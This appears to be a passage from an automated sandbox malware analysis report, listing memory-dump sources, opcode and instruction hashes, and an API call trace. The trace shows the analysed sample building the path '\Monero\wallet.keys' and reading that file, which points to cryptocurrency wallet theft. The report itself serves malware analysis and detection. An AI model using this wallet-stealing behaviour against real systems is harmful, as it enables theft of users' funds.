                                    • Associated: 00000000.00000002.2107128844.000000000064A000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.2107128844.00000000007CE000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.2107128844.00000000008A5000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.2107128844.00000000008CA000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.2107128844.00000000008D5000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.2107128844.00000000008E3000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.2107374782.00000000008E4000.00000080.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.2107486990.0000000000A7A000.00000040.00000001.01000000.00000003.sdmp
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_360000_file.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID:
                                    • String ID:
                                    • API String ID:
                                    • Opcode ID: 16bdfb74a68fea5596375bda6d5785df31f799f6869f10e6a07fb8ee45265206
                                    • Instruction ID: cd0f599b38569749bf698c962a1e439f85ac5363a47d043be4c29208b0ab1952
                                    • Opcode Fuzzy Hash: 16bdfb74a68fea5596375bda6d5785df31f799f6869f10e6a07fb8ee45265206
                                    • Instruction Fuzzy Hash: 8AB13931610659DFDB16CF29C48AB647BA0FF45364F2A865DE899CF2E2C335E981CB40
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2106925343.000000000038C000.00000040.00000001.01000000.00000003.sdmp, Offset: 00360000, based on PE: true
                                    • Associated: 00000000.00000002.2106906466.0000000000360000.00000004.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.2106925343.0000000000361000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.2106925343.000000000049D000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.2106925343.00000000004A9000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.2106925343.00000000004CE000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.2106925343.0000000000636000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.2107128844.000000000064A000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.2107128844.00000000007CE000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.2107128844.00000000008A5000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.2107128844.00000000008CA000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.2107128844.00000000008D5000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.2107128844.00000000008E3000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.2107374782.00000000008E4000.00000080.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.2107486990.0000000000A7A000.00000040.00000001.01000000.00000003.sdmp
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_360000_file.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID:
                                    • String ID:
                                    • API String ID:
                                    • Opcode ID: d866642f9a93dc2b485e42e03c656f9322f63f44223d3d2ee63313605b41ce60
                                    • Instruction ID: ebabc277074b1131ccb99217180070ebc733f601f788e906bb961aa2b1302eb1
                                    • Opcode Fuzzy Hash: d866642f9a93dc2b485e42e03c656f9322f63f44223d3d2ee63313605b41ce60
                                    • Instruction Fuzzy Hash: AAC13975A0471A8FC715DF28C08045AB3F2FF88354F258A6DE8999B721D731E9A6CF81
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2106925343.000000000038C000.00000040.00000001.01000000.00000003.sdmp, Offset: 00360000, based on PE: true
                                    • Associated: 00000000.00000002.2106906466.0000000000360000.00000004.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.2106925343.0000000000361000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.2106925343.000000000049D000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.2106925343.00000000004A9000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.2106925343.00000000004CE000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.2106925343.0000000000636000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.2107128844.000000000064A000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.2107128844.00000000007CE000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.2107128844.00000000008A5000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.2107128844.00000000008CA000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.2107128844.00000000008D5000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.2107128844.00000000008E3000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.2107374782.00000000008E4000.00000080.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.2107486990.0000000000A7A000.00000040.00000001.01000000.00000003.sdmp
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_360000_file.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID:
                                    • String ID:
                                    • API String ID:
                                    • Opcode ID: 12508c5a3310843c85f9c5ddeebf37d3648447172f16da2f5b89db676fd65877
                                    • Instruction ID: 86f045a10e922aefc039a37cc7ed1636e9704a443e45c634e9e21204bdd67b02
                                    • Opcode Fuzzy Hash: 12508c5a3310843c85f9c5ddeebf37d3648447172f16da2f5b89db676fd65877
                                    • Instruction Fuzzy Hash: 0D915A319287916AEB178B38CC41BAAF754FFE6350F14C32EF988B2491FB7189818344
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2106925343.000000000038C000.00000040.00000001.01000000.00000003.sdmp, Offset: 00360000, based on PE: true
                                    • Associated: 00000000.00000002.2106906466.0000000000360000.00000004.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.2106925343.0000000000361000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.2106925343.000000000049D000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.2106925343.00000000004A9000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.2106925343.00000000004CE000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.2106925343.0000000000636000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.2107128844.000000000064A000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.2107128844.00000000007CE000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.2107128844.00000000008A5000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.2107128844.00000000008CA000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.2107128844.00000000008D5000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.2107128844.00000000008E3000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.2107374782.00000000008E4000.00000080.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.2107486990.0000000000A7A000.00000040.00000001.01000000.00000003.sdmp
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_360000_file.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID:
                                    • String ID:
                                    • API String ID:
                                    • Opcode ID: 23b87471342f6f1c58ea4892999818a4d704ced4d641009a5909c51f93f051e8
                                    • Instruction ID: b074b1b568e8d13378c0c8a1008854fa690d07b61d309439b970f6ca70530080
                                    • Opcode Fuzzy Hash: 23b87471342f6f1c58ea4892999818a4d704ced4d641009a5909c51f93f051e8
                                    • Instruction Fuzzy Hash: 2FA12072A10A19CBEB1ACF59DCC1A9EBBB1FB54314F15C62AD41AE73A0D334A944CF50
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2106925343.000000000038C000.00000040.00000001.01000000.00000003.sdmp, Offset: 00360000, based on PE: true
                                    • Associated: 00000000.00000002.2106906466.0000000000360000.00000004.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.2106925343.0000000000361000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.2106925343.000000000049D000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.2106925343.00000000004A9000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.2106925343.00000000004CE000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.2106925343.0000000000636000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.2107128844.000000000064A000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.2107128844.00000000007CE000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.2107128844.00000000008A5000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.2107128844.00000000008CA000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.2107128844.00000000008D5000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.2107128844.00000000008E3000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.2107374782.00000000008E4000.00000080.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.2107486990.0000000000A7A000.00000040.00000001.01000000.00000003.sdmp
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_360000_file.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID:
                                    • String ID:
                                    • API String ID:
                                    • Opcode ID: 143b5be348379f211606af6e5973f90fff61db65041019bd3b0858e73cc7828a
                                    • Instruction ID: 82879e26e6f9715d8be39d64145617bb0507c443543606f726efd7dcbc829166
                                    • Opcode Fuzzy Hash: 143b5be348379f211606af6e5973f90fff61db65041019bd3b0858e73cc7828a
                                    • Instruction Fuzzy Hash: 3BA17072E087119BD308CF25C89075BF7E2EFC8710F1ACA3DA89997254D7B4E9419B82
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2107128844.000000000064A000.00000040.00000001.01000000.00000003.sdmp, Offset: 00360000, based on PE: true
                                    • Associated: 00000000.00000002.2106906466.0000000000360000.00000004.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.2106925343.0000000000361000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.2106925343.000000000038C000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.2106925343.000000000049D000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.2106925343.00000000004A9000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.2106925343.00000000004CE000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.2106925343.0000000000636000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.2107128844.00000000007CE000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.2107128844.00000000008A5000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.2107128844.00000000008CA000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.2107128844.00000000008D5000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.2107128844.00000000008E3000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.2107374782.00000000008E4000.00000080.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.2107486990.0000000000A7A000.00000040.00000001.01000000.00000003.sdmp
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_360000_file.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID:
                                    • String ID:
                                    • API String ID:
                                    • Opcode ID: aa24c1919adfb2ef64672ef17596195f8695434fa119ae3795f3fb98e1cb6805
                                    • Instruction ID: df5f9b292cb89f8702db196c97908ac8d194b1165a802ecc0ad7997bd519944d
                                    • Opcode Fuzzy Hash: aa24c1919adfb2ef64672ef17596195f8695434fa119ae3795f3fb98e1cb6805
                                    • Instruction Fuzzy Hash: 4C51F7F3A0C3045BE3146A6CEC8577AB7D5DB94320F1A463CEB9893781ED3D98058296
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2107128844.000000000064A000.00000040.00000001.01000000.00000003.sdmp, Offset: 00360000, based on PE: true
                                    • Associated: 00000000.00000002.2106906466.0000000000360000.00000004.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.2106925343.0000000000361000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.2106925343.000000000038C000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.2106925343.000000000049D000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.2106925343.00000000004A9000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.2106925343.00000000004CE000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.2106925343.0000000000636000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.2107128844.00000000007CE000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.2107128844.00000000008A5000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.2107128844.00000000008CA000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.2107128844.00000000008D5000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.2107128844.00000000008E3000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.2107374782.00000000008E4000.00000080.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.2107486990.0000000000A7A000.00000040.00000001.01000000.00000003.sdmp
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_360000_file.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID:
                                    • String ID:
                                    • API String ID:
                                    • Opcode ID: 2fd4729dc69b35022e2d4e09234d6b1d0263f6b8f6feccb9d3d0af832978cf32
                                    • Instruction ID: 55c0f5908937c33781dbd5170d4b36783d4ec974852cbcfd8d6344f9f52cb98f
                                    • Opcode Fuzzy Hash: 2fd4729dc69b35022e2d4e09234d6b1d0263f6b8f6feccb9d3d0af832978cf32
                                    • Instruction Fuzzy Hash: 3851F6F3F146105FF3046939DD887AAB6D6EBD4320F2B863DDA88977C4E97988054282
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2107128844.000000000064A000.00000040.00000001.01000000.00000003.sdmp, Offset: 00360000, based on PE: true
                                    • Associated: 00000000.00000002.2106906466.0000000000360000.00000004.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.2106925343.0000000000361000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.2106925343.000000000038C000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.2106925343.000000000049D000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.2106925343.00000000004A9000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.2106925343.00000000004CE000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.2106925343.0000000000636000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.2107128844.00000000007CE000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.2107128844.00000000008A5000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.2107128844.00000000008CA000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.2107128844.00000000008D5000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.2107128844.00000000008E3000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.2107374782.00000000008E4000.00000080.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.2107486990.0000000000A7A000.00000040.00000001.01000000.00000003.sdmp
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_360000_file.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID:
                                    • String ID:
                                    • API String ID:
                                    • Opcode ID: f5a2a0e26ee938d4b4fb4225eee7579d5ed7fd58f29bad5499492f8829eb5465
                                    • Instruction ID: a9cce8188fca2c7bb4161ade96895191b996b6decf92bb3362e912d1036aeaa1
                                    • Opcode Fuzzy Hash: f5a2a0e26ee938d4b4fb4225eee7579d5ed7fd58f29bad5499492f8829eb5465
                                    • Instruction Fuzzy Hash: 16414AF3A087049BE3107E6DEDC577AFBD9EB94320F1A063EDAC487780E57519008696
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2106925343.000000000038C000.00000040.00000001.01000000.00000003.sdmp, Offset: 00360000, based on PE: true
                                    • Associated: 00000000.00000002.2106906466.0000000000360000.00000004.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.2106925343.0000000000361000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.2106925343.000000000049D000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.2106925343.00000000004A9000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.2106925343.00000000004CE000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.2106925343.0000000000636000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.2107128844.000000000064A000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.2107128844.00000000007CE000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.2107128844.00000000008A5000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.2107128844.00000000008CA000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.2107128844.00000000008D5000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.2107128844.00000000008E3000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.2107374782.00000000008E4000.00000080.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.2107486990.0000000000A7A000.00000040.00000001.01000000.00000003.sdmp
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_360000_file.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID:
                                    • String ID:
                                    • API String ID:
                                    • Opcode ID: 2a8b669df8d736d86e52b1f6831f1fee8e67c9cfb658995c3eff484ea6ea57f1
                                    • Instruction ID: 3e13c67e53a66e11ad21b0a8e3b93665c63924e10131da6053934dd8b904429f
                                    • Opcode Fuzzy Hash: 2a8b669df8d736d86e52b1f6831f1fee8e67c9cfb658995c3eff484ea6ea57f1
                                    • Instruction Fuzzy Hash: 47513C63E09BD989C7068B7544502EEBFB21FE6210F1E829EC4A81F383C3755689D3E5
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2107128844.00000000007CE000.00000040.00000001.01000000.00000003.sdmp, Offset: 00360000, based on PE: true
                                    • Associated: 00000000.00000002.2106906466.0000000000360000.00000004.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.2106925343.0000000000361000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.2106925343.000000000038C000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.2106925343.000000000049D000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.2106925343.00000000004A9000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.2106925343.00000000004CE000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.2106925343.0000000000636000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.2107128844.000000000064A000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.2107128844.00000000008A5000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.2107128844.00000000008CA000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.2107128844.00000000008D5000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.2107128844.00000000008E3000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.2107374782.00000000008E4000.00000080.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.2107486990.0000000000A7A000.00000040.00000001.01000000.00000003.sdmp
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_360000_file.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID:
                                    • String ID:
                                    • API String ID:
                                    • Opcode ID: 65d14e018be6aa886e83c3e34861a0f54dabaf098ae4437d54ca096c462a265c
                                    • Instruction ID: f3c5c733c6f1c8762ea9c88b1f4e026c315718bc15ca16b248e867aa97533268
                                    • Opcode Fuzzy Hash: 65d14e018be6aa886e83c3e34861a0f54dabaf098ae4437d54ca096c462a265c
                                    • Instruction Fuzzy Hash: E731A5B250C704AFE309AE69DC416BAFBE4EF88720F15492DF6C5C3240D6355840C697
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2107128844.00000000007CE000.00000040.00000001.01000000.00000003.sdmp, Offset: 00360000, based on PE: true
                                    • Associated: 00000000.00000002.2106906466.0000000000360000.00000004.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.2106925343.0000000000361000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.2106925343.000000000038C000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.2106925343.000000000049D000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.2106925343.00000000004A9000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.2106925343.00000000004CE000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.2106925343.0000000000636000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.2107128844.000000000064A000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.2107128844.00000000008A5000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.2107128844.00000000008CA000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.2107128844.00000000008D5000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.2107128844.00000000008E3000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.2107374782.00000000008E4000.00000080.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.2107486990.0000000000A7A000.00000040.00000001.01000000.00000003.sdmp
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_360000_file.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID:
                                    • String ID:
                                    • API String ID:
                                    • Opcode ID: 34f222a395e379bd34ee93c2568fd243d1e21452a68eed2362074fa08e25a98e
                                    • Instruction ID: e5943f69042ea1fcbb41b27ce8eee388c2d8e3e7672006adcc918182b6cde2df
                                    • Opcode Fuzzy Hash: 34f222a395e379bd34ee93c2568fd243d1e21452a68eed2362074fa08e25a98e
                                    • Instruction Fuzzy Hash: 793107B211C7089FE711BE68DCC17BAFBE5EF18260F06492DE6D083610E675A8408A97
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2106925343.000000000038C000.00000040.00000001.01000000.00000003.sdmp, Offset: 00360000, based on PE: true
                                    • Associated: 00000000.00000002.2106906466.0000000000360000.00000004.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.2106925343.0000000000361000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.2106925343.000000000049D000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.2106925343.00000000004A9000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.2106925343.00000000004CE000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.2106925343.0000000000636000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.2107128844.000000000064A000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.2107128844.00000000007CE000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.2107128844.00000000008A5000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.2107128844.00000000008CA000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.2107128844.00000000008D5000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.2107128844.00000000008E3000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.2107374782.00000000008E4000.00000080.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.2107486990.0000000000A7A000.00000040.00000001.01000000.00000003.sdmp
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_360000_file.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID:
                                    • String ID:
                                    • API String ID:
                                    • Opcode ID: dffa8fe14fb17786e60520bf3c8c8ace1f347de8b7b0a65a7913e683934b358a
                                    • Instruction ID: 6f3579539133c16e82723237803b8971b03cd8b531f9f429ebb9f832563e04b3
                                    • Opcode Fuzzy Hash: dffa8fe14fb17786e60520bf3c8c8ace1f347de8b7b0a65a7913e683934b358a
                                    • Instruction Fuzzy Hash: 27D0C971A097118FC3688F1EF440546FAE8EBD8320715C53FA09EC3750C6B494418B54
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2106925343.0000000000361000.00000040.00000001.01000000.00000003.sdmp, Offset: 00360000, based on PE: true
                                    • Associated: 00000000.00000002.2106906466.0000000000360000.00000004.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.2106925343.000000000038C000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.2106925343.000000000049D000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.2106925343.00000000004A9000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.2106925343.00000000004CE000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.2106925343.0000000000636000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.2107128844.000000000064A000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.2107128844.00000000007CE000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.2107128844.00000000008A5000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.2107128844.00000000008CA000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.2107128844.00000000008D5000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.2107128844.00000000008E3000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.2107374782.00000000008E4000.00000080.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.2107486990.0000000000A7A000.00000040.00000001.01000000.00000003.sdmp
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_360000_file.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID:
                                    • String ID:
                                    • API String ID:
                                    • Opcode ID: eecc59efbe9cdf3acfc8abb57b86a9aab05cbe8bc62256deaf8fcc3308cb31aa
                                    • Instruction ID: abbdd297b848902a35704da264ecc4a7d2e6ec457c67c65f9fa5c7ab4ebdfac4
                                    • Opcode Fuzzy Hash: eecc59efbe9cdf3acfc8abb57b86a9aab05cbe8bc62256deaf8fcc3308cb31aa
                                    • Instruction Fuzzy Hash: 1EE04878A56608EFC740CF88D584E49B7F8EB0D720F1181D5ED099B721D235EE00EA90
                                    APIs
                                      • Part of subcall function 0037AA50: lstrcpy.KERNEL32(00380E1A,00000000), ref: 0037AA98
                                      • Part of subcall function 00378F70: SHGetFolderPathA.SHELL32(00000000,0000001C,00000000,00000000,?,?,000003E8), ref: 00378F9B
                                      • Part of subcall function 0037AC30: lstrcpy.KERNEL32(00000000,?), ref: 0037AC82
                                      • Part of subcall function 0037AC30: lstrcat.KERNEL32(00000000), ref: 0037AC92
                                      • Part of subcall function 0037ABB0: lstrcpy.KERNEL32(?,00380E1A), ref: 0037AC15
                                      • Part of subcall function 0037ACC0: lstrlen.KERNEL32(?,00F38980,?,\Monero\wallet.keys,00380E1A), ref: 0037ACD5
                                      • Part of subcall function 0037ACC0: lstrcpy.KERNEL32(00000000), ref: 0037AD14
                                      • Part of subcall function 0037ACC0: lstrcat.KERNEL32(00000000,00000000), ref: 0037AD22
                                      • Part of subcall function 0037AAB0: lstrcpy.KERNEL32(?,00000000), ref: 0037AAF6
                                      • Part of subcall function 0036A110: CreateFileA.KERNEL32(00000000,80000000,00000001,00000000,00000003,00000000,00000000), ref: 0036A13C
                                      • Part of subcall function 0036A110: GetFileSizeEx.KERNEL32(000000FF,?), ref: 0036A161
                                      • Part of subcall function 0036A110: LocalAlloc.KERNEL32(00000040,?), ref: 0036A181
                                      • Part of subcall function 0036A110: ReadFile.KERNEL32(000000FF,?,00000000,0036148F,00000000), ref: 0036A1AA
                                      • Part of subcall function 0036A110: LocalFree.KERNEL32(0036148F), ref: 0036A1E0
                                      • Part of subcall function 0036A110: CloseHandle.KERNEL32(000000FF), ref: 0036A1EA
                                      • Part of subcall function 00378FC0: LocalAlloc.KERNEL32(00000040,-00000001), ref: 00378FE2
